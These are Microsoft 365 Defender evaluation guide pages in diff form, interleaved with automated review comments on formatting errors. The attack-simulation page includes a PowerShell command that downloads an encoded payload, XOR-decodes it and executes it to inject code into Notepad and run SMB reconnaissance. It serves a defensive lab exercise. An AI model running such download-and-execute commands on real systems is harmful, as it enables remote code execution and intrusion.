+ - Has [Windows Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features) enabled. If you are having trouble enabling Windows Defender Antivirus, see this [troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
+ - Is [onboarded to Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+
+If you use tenant and device groups, create a dedicated device group for the test device and push it to top level.
+
+One alternative is to host your AD DS domain controller and test device as virtual machines in Microsoft Azure infrastructure services. You can use the instructions in [Phase 1 of the simulated enterprise Test Lab Guide](/microsoft-365/enterprise/simulated-ent-base-configuration-microsoft-365-enterprise#phase-1-create-a-simulated-intranet), but skip the creation of the APP1 virtual machine.
+
+Here is the result.
+
+![Endpoints for your Defender evaluation environment using the simulated enterprise Test Lab Guide](../../media/eval-defender-investigate-respond/eval-defender-eval-investigate-respond-endpoints-tlg.png)
+
+You'll simulate a sophisticated attack that leverages advanced techniques to hide from detection. The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of users' devices. This category of attacks usually doesn't include files dropped on the victim's device and they occur solely in memory. They "live off the land" by using existing system and administrative tools and inject their code into system processes to hide their execution. Such behavior allows them to evade detection and persist on the device.
+
+In this simulation, our sample scenario starts with a PowerShell script. In the real world, a user might be tricked into running a script or the script might run from a remote connection to another computer from a previously infected device, which indicates that the attacker is attempting to move laterally in the network. Detection of these scripts can be difficult because administrators also often run scripts remotely to carry out various administrative activities.
+
+![Fileless PowerShell attack with process injection and SMB reconnaisance attack diagram](../../media/mtp/mtpdiydiagram.png)
+
+During the simulation, the attack injects shellcode into a seemingly innocent process. The scenario requires the use of notepad.exe. We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. The shellcode then goes on to contact the attacker's command-and-control (C2) server to receive instructions on how to proceed. The script attempts executing reconnaissance queries against the domain controller (DC). Reconnaissance allows an attacker to get information about recent user login information. Once attackers have this information, they can move laterally in the network to get to a specific sensitive account
+
+> [!IMPORTANT]
+> For optimum results, follow the attack simulation instructions as closely as possible.
+
+### Run the isolated AD DS domain controller attack simulation
+
+To run the attack scenario simulation:
+
+1. Ensure that your pilot environment includes the isolated AD DS domain controller and Windows 10 device.
+
+2. Sign in to the test device with the test user account.
+
+3. Open a Windows PowerShell window on the test device.
+
+4. Copy the following simulation script:
+
+ ```powershell
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
+ = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
+ -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
+ $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
+ $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
+ ```
+
+ > [!NOTE]
+ > If you open this article on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. If this is the case, download this document and open it on Adobe Reader.
+
+5. Paste and run the copied script in the PowerShell window.
+
+> [!NOTE]
+> If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the **CTRL-V** hotkey or right-click-paste method might not work. Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.
+
+A few seconds later, the Notepad app will open. A simulated attack code will be injected into Notepad. Keep the automatically generated Notepad instance open to experience the full scenario.
+
+The simulated attack code will attempt to communicate to an external IP address (simulating the C2 server) and then attempt reconnaissance against the domain controller through SMB.
+
+You'll see this message displayed on the PowerShell console when this script completes:
+
+```console
+ran NetSessionEnum against [DC Name] with return code result 0
+```
+
+To see the Automated Incident and Response feature in action, keep the notepad.exe process open. You'll see Automated Incident and Response stop the Notepad process.
+
+### Investigate the incident for the simulated attack
+
+> [!NOTE]
+> Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bzwz?]
+
+Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft 365 Defender portal.
+
+1. Open the [Microsoft 365 Defender portal](https://security.microsoft.com/).
+
+2. From the navigation pane, select **Incidents & Alerts > Incidents**.
+
+3. The new incident for the simulated attack will appear in the incident queue.
+
+ ![Example of the incident queue](../../media/mtp/fig2.png)
+
+#### Investigate the attack as a single incident
+
+Microsoft 365 Defender correlates analytics and aggregates all related alerts and investigations from different products into one incident entity. By doing so, Microsoft 365 Defender shows a broader attack story, allowing the SOC analyst to understand and respond to complex threats.
+
+The alerts generated during this simulation are associated with the same threat, and as a result, are automatically aggregated as a single incident.
+
+To view the incident:
+
+1. Open the [Microsoft 365 Defender portal](https://security.microsoft.com/).
+
+2. From the navigation pane, select **Incidents & Alerts > Incidents**.
+
+3. Select the newest item by clicking on the circle located left of the incident name. A side panel displays additional information about the incident, including all the related alerts. Each incident has a unique name that describes it based on the attributes of the alerts it includes.
+
+ The alerts that are shown in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Cloud App Security, Microsoft Defender for Endpoint, Microsoft 365 Defender, and Microsoft Defender for Office 365.
+
+3. Select **Open incident page** to get more information about the incident.
+
+ In the **Incident** page, you can see all the alerts and information related to the incident. The information includes the entities and assets that are involved in the alert, the detection source of the alerts (such as Microsoft Defender for Identity or Microsoft Defender for Endpoint), and the reason they were linked together. Reviewing the incident alert list shows the progression of the attack. From this view, you can see and investigate the individual alerts.
+
+ You can also click **Manage incident** from the right-hand menu, to tag the incident, assign it to yourself, and add comments.
+
+#### Review generated alerts
+
+Let's look at some of the alerts generated during the simulated attack.
+
+> [!NOTE]
+> We'll walk through only a few of the alerts generated during the simulated attack. Depending on the version of Windows and the Microsoft 365 Defender products running on your test device, you might see more alerts that appear in a slightly different order.
+
+![Example of the generated alerts](../../media/mtp/fig6.png)
+
+##### Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint)
+
+Advanced attackers use sophisticated and stealthy methods to persist in memory and hide from detection tools. One common technique is to operate from within a trusted system process rather than a malicious executable, making it hard for detection tools and security operations to spot the malicious code.
+
+To allow the SOC analysts to catch these advanced attacks, deep memory sensors in Microsoft Defender for Endpoint provide our cloud service with unprecedented visibility into a variety of cross-process code injection techniques. The following figure shows how Defender for Endpoint detected and alerted on the attempt to inject code to <i>notepad.exe</i>.
+
+![Example of the alert for injection of potentially malicious code](../../media/mtp/fig7.png)
+
+##### Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint)
+
+Microsoft Defender for Endpoint detections often target the most common attribute of an attack technique. This method ensures durability and raises the bar for attackers to switch to newer tactics.
+
+We employ large-scale learning algorithms to establish the normal behavior of common processes within an organization and worldwide and watch for when these processes show anomalous behaviors. These anomalous behaviors often indicate that extraneous code was introduced and is running in an otherwise trusted process.
+
+For this scenario, the process <i>notepad.exe</i> is exhibiting abnormal behavior, involving communication with an external location. This outcome is independent of the specific method used to introduce and execute the malicious code.
+
+> [!NOTE]
+> Because this alert is based on machine-learning models that require additional backend processing, it might take some time before you see this alert in the portal.
+
+Notice that the alert details include the external IP addressΓÇöan indicator that you can use as a pivot to expand investigation.
+
+Select the IP address in the alert process tree to view the IP address details page.
+
+![Example of the alert for unexpected behavior by a process run with no command line arguments](../../media/mtp/fig8.png)
+
+The following figure displays the selected IP Address details page (clicking on IP address in the Alert process tree).
+
+![Example of the IP address details page](../../media/mtp/fig9.png)
+
+##### Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)
+
+Enumeration using Server Message Block (SMB) protocol enables attackers to get recent user logon information that helps them move laterally through the network to access a specific sensitive account.
+
+In this detection, an alert is triggered when the SMB session enumeration runs against a domain controller.
+
+![Example of the Microsoft Defender for Identity alert for User and IP address reconnaissance](../../media/mtp/fig10.png)
+
+#### Review the device timeline with Microsoft Defender for Endpoint
+
+After exploring the various alerts in this incident, navigate back to the incident page you investigated earlier. Select the **Devices** tab in the incident page to review the devices involved in this incident as reported by Microsoft Defender for Endpoint and Microsoft Defender for Identity.
+
+Select the name of the device where the attack was conducted, to open the entity page for that specific device. In that page, you can see alerts that were triggered and related events.
+
+Select the **Timeline** tab to open the device timeline and view all events and behaviors observed on the device in chronological order, interspersed with the alerts raised.
+
+![Example of the device timeline with behaviors](../../media/mtp/fig11.png)
+
+Expanding some of the more interesting behaviors provides useful details, such as process trees.
+
+For example, scroll down until you find the alert event **Suspicious process injection observed**. Select the **powershell.exe injected to notepad.exe process** event below it, to display the full process tree for this behavior under the **Event entities** graph on the side pane. Use the search bar for filtering if necessary.
+
+![Example of the process tree for selected PowerShell file creation behavior](../../media/mtp/fig12.png)
+
+#### Review the user information with Microsoft Cloud App Security
+
+On the incident page, select the **Users** tab to display the list of users involved in the attack. The table contains additional information about each user, including each user's **Investigation Priority** score.
+
+Select the user name to open the user's profile page where further investigation can be conducted. [Read more about investigating risky users](/cloud-app-security/tutorial-ueba#identify).
+
+![Example of Cloud App Security user page](../../media/mtp/fig13.png)
+
+#### Automated investigation and remediation
+
+> [!NOTE]
+>Before we walk you through this simulation, watch the following video to get familiar with what automated self-healing is, where to find it in the portal, and how it can help in your security operations:
+
+> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4BzwB]
+
+Navigate back to the incident in the Microsoft 365 Defender portal. The **Investigations** tab in the **Incident** page shows the automated investigations that were triggered by Microsoft Defender for Identity and Microsoft Defender for Endpoint. The screenshot below displays only the automated investigation triggered by Defender for Endpoint. By default, Defender for Endpoint automatically remediates the artifacts found in the queue, which requires remediation.
+
+![Example of the automated investigations related to the incident](../../media/mtp/fig14.png)
+
+Select the alert that triggered an investigation to open the **Investigation details** page. You'll see the following details:
+
+- Alert(s) that triggered the automated investigation.
+- Impacted users and devices. If indicators are found on additional devices, these additional devices will be listed as well.
+- List of evidence. The entities found and analyzed, such as files, processes, services, drivers, and network addresses. These entities are analyzed for possible relationships to the alert and rated as benign or malicious.
+- Threats found. Known threats that are found during the investigation.
+
+> [!NOTE]
+> Depending on timing, the automated investigation might still be running. Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. Refresh the **Investigation details** page to get the latest findings.
+
+![Example of the Investigation details page](../../media/mtp/fig15.png)
+
+During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.
+
+You can see <i>notepad.exe</i> disappear from the list of running processes on the test device.
+
+#### Resolve the incident
+
+After the investigation is complete and confirmed to be remediated, you resolve the incident.
+
+From the **Incident** page, select **Manage incident**. Set the status to **Resolve incident** and select **True alert** for the classification and **Security testing** for the determination.
+
+![Example of the the incidents page with the open Manage incident panel where you can click the switch to resolve incident](../../media/mtp/fig16.png)
+
+When the incident is resolved, it resolves all of the associated alerts in Microsoft 365 Defender portal and in the related portals.
+
+This wraps up the attack simulation for incident analysis, automated investigation, and incident resolution.
+
+## Next step
+
+[![Try Microsoft 365 Defender incident response capabilities](../../medi)
+
+Step 2 of 2: [Try Microsoft 365 Defender incident response capabilities](eval-defender-investigate-respond-additional.md)
+
+### Navigation you may need
+
+[Create the Microsoft 365 Defender Evaluation Environment](eval-create-eval-environment.md)
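Review bot: the Next step image link `[![Try Microsoft 365 Defender incident response capabilities](../../medi)` is truncated and malformed; the image path is cut off and the outer link never gets its `](target)` part, so it will render as literal text instead of a clickable image. Restore the full image path and give the outer link the same `eval-defender-investigate-respond-additional.md` target used in the "Step 2 of 2" line below it. Smaller points in the same region: the alt text "Example of the the incidents page" doubles "the"; the note body `>Before we walk you through this simulation` is missing the space after `>`; `<i>notepad.exe</i>` should use Markdown italics (`*notepad.exe*`) like the rest of the article; and the alt text for fig12.png says "PowerShell file creation behavior" while the paragraph above it describes the process injection event, so one of the two should be aligned.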
security Eval Defender Investigate Respond https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond.md
+
+ Title: Investigate and respond using Microsoft 365 Defender in a pilot environment, and use Attack Simulator, teach users to detect, investigate attack surfaces, and strengthen your security posture
+description: Set up attack simulations in Microsoft 365 Defender trial lab or pilot environment to try out the security solution designed to teach users to protect devices, identity, data, and applications.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
+localization_priority: Normal
++ Last updated : 07/09/2021+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Investigate and respond using Microsoft 365 Defender in a pilot environment
+
+**Applies to:**
+- Microsoft 365 Defender
+
+This article outlines the process to create incidents with attack simulations and tutorials and use Microsoft 365 Defender to investigate and respond. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+
+Use the following steps.
+
+![Steps for performing simulated incident response in the Microsoft 365 Defender evaluation environment](../../media/eval-defender-investigate-respond/eval-defender-eval-investigate-respond-steps.png)
+
+The following table describes the steps in the illustration.
+
+| |Step |Description |
+||||
+|1|[Simulate attacks](eval-defender-investigate-respond-simulate-attack.md) | Simulate attacks on your evaluation environment and use the Microsoft 365 Defender portal to perform incident response. |
+|2|[Try incident response capabilities ](eval-defender-investigate-respond-additional.md) | Try features and capabilities in Microsoft 365 Defender. |
+||||
+
+### Navigation you may need
+
+[Create the Microsoft 365 Defender Evaluation Environment](eval-create-eval-environment.md)
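Review bot: the table starting at `| |Step |Description |` has a separator row of `||||` with no dashes, so as written it will not render as a Markdown table; it needs a `|---|---|---|` separator, and the trailing empty `||||` row should be removed. The front matter is also incomplete: the ` Title:` line has a leading space and there are no enclosing `---` fences, the line `++ Last updated : 07/09/2021+` is garbled, and the three list items starting with `- M365-security-compliance` have no `ms.collection:` key above them. Minor: `[Try incident response capabilities ]` has a trailing space inside the link text.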
security Eval Defender Mcas Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-architecture.md
+
+ Title: Review architecture requirements and the structure for Microsoft Cloud App Security, plan the configuration and design by knowing the framework of Cloud App Security in Microsoft 365 Defender
+description: Microsoft Cloud App Security technical diagrams explain the architecture in Microsoft 365 Defender, which will help you build a pilot environment.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Review architecture requirements and key concepts for Microsoft Cloud App Security
++
+**Applies to:**
+
+- Microsoft 365 Defender
+
+This article is [Step 1 of 3](eval-defender-mcas-overview.md) in the process of setting up the evaluation environment for Microsoft Cloud App Security alongside Microsoft 365 Defender. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
+
+Before enabling Microsoft Cloud App Security, be sure you understand the architecture and can meet the requirements.
+
+## Understand the architecture
+
+Microsoft Cloud App Security is a Cloud Access Security Broker (CASB). CASBs act a gatekeeper to broker access in real time between your enterprise users and cloud resources they use, wherever your users are located and regardless of the device they are using. Microsoft Cloud App Security natively integrates with Microsoft security capabilities, including Microsoft 365 Defender.
+
+Without Cloud App Security, cloud apps that are used by your organization are unmanaged and unprotected, as illustrated.
+
+![Architecture for Microsoft Cloud App Security](../../media/defender/m365-defender-mcas-architecture-a.png)
+
+In the illustration:
+- The use of cloud apps by an organization is unmonitored and unprotected.
+- This use falls outside the protections achieved within a managed organization.
+
+#### Discovering cloud apps
+
+The first step to managing the use of cloud apps is to discover which cloud apps are used by your organization. This next diagram illustrates how cloud discovery works with Cloud App Security.
+
+![Architecture for Microsoft Cloud App Security - Cloud discovery](../../media/defender/m365-defender-mcas-architecture-b.png)
+
+In this illustration, there are two methods that can be used to monitor network traffic and discover cloud apps that are being used by your organization.
+- A. Cloud App Discovery integrates with Microsoft Defender for Endpoint natively. Defender for Endpoint reports cloud apps and services being accessed from IT-managed Windows 10 devices.
+- B. For coverage on all devices connected to a network, the Cloud App Security log collector is installed on firewalls and other proxies to collect data from endpoints. This data is sent to Cloud App Security for analysis.
+
+#### Managing cloud apps
+
+After you discover cloud apps and analyze the behavior of how these are used by your organization, you can begin managing cloud apps that you choose.
+
+![Architecture for Microsoft Cloud App Security - Managing cloud apps](../../media/defender/m365-defender-mcas-architecture-c.png)
+
+In this illustration:
+- Some apps are sanctioned for use. This is a simple way of beginning to manage apps.
+- You can enable greater visibility and control by connecting apps with app connectors. App connectors use the APIs of app providers.
++
+#### Applying session controls to cloud apps
+
+Microsoft Cloud App Security serves as a reverse proxy, providing proxy access to sanctioned cloud apps. This allows Cloud App Security to apply session controls that you configure.
+
+![Architecture for Microsoft Cloud App Security - Proxy access session control](../../media/defender/m365-defender-mcas-architecture-d.png)
+
+In this illustration:
+- Access to sanctioned cloud apps from users and devices in your organization is routed through Cloud App Security.
+- This proxy access allows session controls to be applied.
+- Cloud apps that you have not sanctioned or explicitly unsanctioned are not affected.
+
+Session controls allow you to apply parameters to how cloud apps are used by your organization. For example, if your organization is using Salesforce, you can configure a session policy that allows only managed devices to access your organization's data in Salesforce. A simpler example could be configuring a policy to monitor traffic from unmanaged devices so you can analyze the risk of this traffic before applying stricter policies.
+
+#### Integrating with Azure AD with Conditional Access App Control
+
+You might already have SaaS apps added to your Azure AD tenant to enforce multi-factor authentication and other conditional access policies. Microsoft Cloud App Security natively integrates with Azure AD. All you have to do is configure a policy in Azure AD to use Conditional Access App Control in Cloud App Security. This routes network traffic for these managed SaaS apps through Cloud App Security as a proxy, which allows Cloud App Security to monitor this traffic and to apply session controls.
+
+![Architecture for Microsoft Cloud App Security - SaaS apps](../../media/defender/m365-defender-mcas-architecture-e.png)
+
+In this illustration:
+- SaaS apps are integrated with the Azure AD tenant. This allows Azure AD to enforce conditional access policies, including multi-factor authentication.
+- A policy is added to Azure Active Directory to direct traffic for SaaS apps to Cloud App Security. The policy specifies which SaaS apps to apply this policy to. Consequently, after Azure AD enforces any conditional access policies that apply to these SaaS apps, Azure AD then directs (proxies) the session traffic through Cloud App Security.
+- Cloud App Security monitors this traffic and applies any session control policies that have been configured by administrators.
+
+You might have discovered and sanctioned cloud apps using Cloud App Security that have not been added to Azure AD. You can take advantage of Conditional Access App Control by adding these cloud apps to your Azure AD tenant and the scope of your conditional access rules.
+
+#### Protecting your organization from hackers
+
+Cloud App Security provides powerful protection on its own. However, when combined with the other capabilities of Microsoft 365 Defender, Cloud App Security provides data into the shared signals which, together, helps stop attacks.
+
+It's worth repeating this illustration from the overview to this Microsoft 365 Defender evaluation and pilot guide.
+
+![How Microsoft 365 Defender stops a chain of threats](../../media/defender/m365-defender-eval-threat-chain.png)
+
+Focusing on the right side of this illustration, Microsoft Cloud App Security notices anomalous behavior like impossible-travel, credential access, and unusual download, file share, or mail forwarding activity and reports these to the security team. Consequently, Cloud App Security helps prevent lateral movement by hackers and exfiltration of sensitive data. Microsoft 356 Defender correlates the signals from all the components to provide the full attack story.
+
+## Understand key concepts
+
+The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Microsoft Cloud App Security.
++
+|Concept |Description |More information |
+||||
+| Cloud App Security Dashboard | Presents an overview of the most important information about your organization and gives links to deeper investigation. | [Working with the dashboard ](/cloud-app-security/daily-activities-to-protect-your-cloud-environment) |
+| Conditional Access App Control | Reverse proxy architecture that integrates with your Identity Provider (IdP) to give Azure AD conditional access policies and selectively enforce session controls. | [Protect apps with Microsoft Cloud App Security Conditional Access App Control](/cloud-app-security/proxy-intro-aad) |
+| Cloud App Catalog | The Cloud App Catalog gives you a full picture against Microsoft catalog of over 16,000 cloud apps that are ranked and scored based on more than 80 risk factors. | [Working with App risk scores](/cloud-app-security/risk-score) |
+| Cloud Discovery Dashboard | Cloud Discovery analyzes your traffic logs and is designed to give more insight into how cloud apps are being used in your organization as well as give alerts and risk levels. | [Working with discovered apps ](/cloud-app-security/discovered-apps) |
+|Connected Apps |Cloud App Security provides end-to-end protection for connected apps using Cloud-to-Cloud integration, API connectors, and real-time access and session controls leveraging our Conditional App Access Controls. |[Protecting connected apps](/cloud-app-security/protect-connected-apps) |
+| | | |
+
+## Review architecture requirements
+
+### Discovering cloud apps
+
+To discover cloud apps used in your environment, you can do one or both of the following:
+
+- Get up and running quickly with Cloud Discovery by integrating with Microsoft Defender for Endpoint. This native integration enables you to immediately start collecting data on cloud traffic across your Windows 10 devices, on and off your network.
+- To discover all cloud apps accessed by all devices connected to your network, deploy the Cloud App Security log collector on your firewalls and other proxies. This collects data from your endpoints and sends it to Cloud App Security for analysis. Cloud App Security natively integrates with some third-party proxies for even more capabilities.
+
+These options are included in [Step 2. Enable the evaluation environment](eval-defender-mcas-enable-eval.md).
+
+### Applying Azure AD Conditional Access policies to cloud apps
+
+Conditional Access App Control (the ability to apply Conditional Access policies to cloud apps) requires integration with Azure AD. This isn't a requirement for getting started with Cloud App Security. It is a step we encourage you to try out during the pilot phase ΓÇö [Step 3. Pilot Microsoft Cloud App Security](eval-defender-mcas-pilot.md).
+
+## SIEM integration
+
+You can integrate Microsoft Cloud App Security with your generic SIEM server or with Azure Sentinel to enable centralized monitoring of alerts and activities from connected apps.
+
+Additionally, Azure Sentinel includes a Microsoft Cloud App Security connector to provide deeper integration with Azure Sentinel. This enables you to not only gain visibility into your cloud apps but to also get sophisticated analytics to identify and combat cyberthreats and to control how your data travels.
+
+- [Generic SIEM integration](/cloud-app-security/siem)
+- [Stream alerts and Cloud Discovery logs from MCAS into Azure Sentinel](/azure/sentinel/connect-cloud-app-security)
+
+### Next steps
+
+Step 2 of 3: [Enable the evaluation environment for Microsoft Cloud App Security](eval-defender-mcas-enable-eval.md)
+
+Return to the overview for [Evaluate Microsoft Cloud App Security](eval-defender-mcas-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
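Review bot: the second link in `This article is [Step 1 of 3](eval-defender-mcas-overview.md) ... see the [overview article](eval-defender-identity-overview.md)` points at the Defender for Identity overview; it should be `eval-defender-mcas-overview.md`, matching the first link in the same sentence. In the Conditional Access paragraph, `pilot phase ΓÇö [Step 3. Pilot Microsoft Cloud App Security]` has the em dash rendered as the mojibake sequence `ΓÇö`; replace it with the intended dash or a plain hyphen. Text fixes: "CASBs act a gatekeeper" should read "act as a gatekeeper"; "Microsoft 356 Defender correlates the signals" should be "Microsoft 365 Defender"; "The following table identified key concepts" should be "identifies"; the heading "Integrating with Azure AD with Conditional Access App Control" repeats "with"; and "Conditional App Access Controls" in the Connected Apps row should match the feature name "Conditional Access App Control" used everywhere else. Structure: `## SIEM integration` is an H2 while its neighbours under "Review architecture requirements" are H3, and `### Next steps` is an H3 where the sibling articles use `## Next steps`.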
security Eval Defender Mcas Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-enable-eval.md
+
+ Title: Enable the evaluation environment for Microsoft Cloud App Security
+description: Learn the architecture of MCAS within Microsoft Defender for Office 365 and understand interactions between the Microsoft 365 Defender products.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable the evaluation environment for Microsoft Cloud App Security
++
+**Applies to:**
+
+- Microsoft 365 Defender
+
+This article is [Step 2 of 2](eval-defender-mcas-overview.md) in the process of setting up the evaluation environment for Microsoft Cloud App Security. For more information about this process, see the [overview article](eval-defender-mcas-overview.md).
+
+This article walks you through the process of accessing the Cloud App Security portal and configuring the necessary integration to collect cloud app traffic data.
+
+To discover cloud apps used in your environment, you can do one or both of the following:
+
+- Get up and running quickly with Cloud Discovery by integrating with Microsoft Defender for Endpoint. This native integration enables you to immediately start collecting data on cloud traffic across your Windows 10 devices, on and off your network.
+- To discover all cloud apps accessed by all devices connected to your network, deploy the Cloud App Security log collector on your firewalls and other proxies. This collects data from your endpoints and sends it to Cloud App Security for analysis. Cloud App Security natively integrates with some third-party proxies for even more capabilities.
+
+This article includes guidance for both methods.
+
+Use the following steps to set up Microsoft Cloud App Security.
+
+![Steps to enable Microsoft Microsoft Cloud App Security in the Microsoft Defender evaluation environment](../../media/defender/m365-defender-mcas-eval-enable-steps.png)
+
+- [Step 1. Connect to the Cloud App Security portal](#step-1-connect-to-the-cloud-app-security-portal)
+- [Step 2. Integrate with Microsoft Defender for Endpoint](#step-2-integrate-with-microsoft-defender-for-endpoint)
+- [Step 3. Deploy the Cloud App Security log collector on your firewalls and other proxies](#step-3-deploy-the-cloud-app-security-log-collector-on-your-firewalls-and-other-proxies)
+- [Step 4. View the Cloud Discovery dashboard to see what apps are being used in your organization](#step-4-view-the-cloud-discovery-dashboard-to-see-what-apps-are-being-used-in-your-organization)
+
+## Step 1. Connect to the Cloud App Security portal
+
+To verify licensing and to connect to the Cloud App Security portal, see [Quickstart: Get started with Microsoft Cloud App Security](/cloud-app-security/getting-started-with-cloud-app-security).
+
+If you're not immediately able to connect to the portal, you might need to add the IP address to the allow list of your firewall. See [Basic setup for Cloud App Security](/cloud-app-security/general-setup).
+
+If you're still having trouble, review [Network requirements](/cloud-app-security/network-requirements).
+
+## Step 2. Integrate with Microsoft Defender for Endpoint
+
+Microsoft Cloud App Security integrates with Microsoft Defender for Endpoint natively. The integration simplifies roll out of Cloud Discovery, extends Cloud Discovery capabilities beyond your corporate network, and enables device-based investigation. This integration reveals cloud apps and services being accessed from IT-managed Windows 10 devices.
+
+If you've already set up Microsoft Defender for Endpoint, configuring integration with Cloud App Security is a toggle in Microsoft 365 Defender. After integration is turned on, you can return to the Cloud App Security portal and view rich data in the Cloud Discovery Dashboard.
+
+To accomplish these tasks, see [Microsoft Defender for Endpoint integration with Microsoft Cloud App Security](/cloud-app-security/mde-integration).
+
+## Step 3. Deploy the Cloud App Security log collector on your firewalls and other proxies
+
+For coverage on all devices connected to your network, deploy the Cloud App Security log collector on your firewalls and other proxies to collect data from your endpoints and send it to Cloud App Security for analysis.
+
+If you're using one of the following Secure Web Gateways (SWG), Cloud App Security provides seamless deployment and integration:
+- Zscaler
+- iboss
+- Corrata
+- Menlo Security
+
+For more information on integrating with these network devices, see [Set up Cloud Discovery](/cloud-app-security/set-up-cloud-discovery).
+## Step 4. View the Cloud Discovery dashboard to see what apps are being used in your organization
+
+The Cloud Discovery dashboard is designed to give you more insight into how cloud apps are being used in your organization. It provides an at-a-glance overview of what kinds of apps are being used, your open alerts, and the risk levels of apps in your organization.
+
+To get started using the Cloud Discovery dashboard, see [Working with discovered apps](/cloud-app-security/discovered-apps).
+
+## Next steps
+
+Step 3 of 3: [Pilot Microsoft Cloud App Security](eval-defender-mcas-pilot.md)
+
+Return to the overview for [Evaluate Microsoft Cloud App Security](eval-defender-mcas-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
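Review bot: the step count in `This article is [Step 2 of 2](eval-defender-mcas-overview.md)` is wrong; the Next steps section of the same file says `Step 3 of 3: [Pilot Microsoft Cloud App Security]`, so this should read "Step 2 of 3". The `description:` line ("Learn the architecture of MCAS within Microsoft Defender for Office 365 ...") appears to be copied from the Office 365 article and does not describe this page, which covers connecting to the Cloud App Security portal and enabling Cloud Discovery; rewrite it accordingly. Also: the alt text "Steps to enable Microsoft Microsoft Cloud App Security" doubles "Microsoft"; a blank line is missing between `... see [Set up Cloud Discovery](/cloud-app-security/set-up-cloud-discovery).` and `## Step 4.`, without which some renderers will not treat it as a heading; and the front matter has a stray `++` line and list items with no `ms.collection:` key above them.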
security Eval Defender Mcas Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-overview.md
+
+ Title: Evaluate Microsoft Cloud App Security overview, setup or set up an evaluation of device, identity, data, and app protection, as part of Microsoft 365 Defender
+description: Steps to set up your Microsoft 365 Defender trial lab or pilot environment to try out and experience the security solution designed to protect devices, identity, data, and applications in your organization.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate Microsoft Cloud App Security
+
+**Applies to:**
+- Microsoft 365 Defender
++
+This article outlines the process to enable and pilot Microsoft Cloud App Security alongside Microsoft 365 Defender. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+<br>
+
+Use the following steps to enable and pilot Microsoft cloud app security.
+
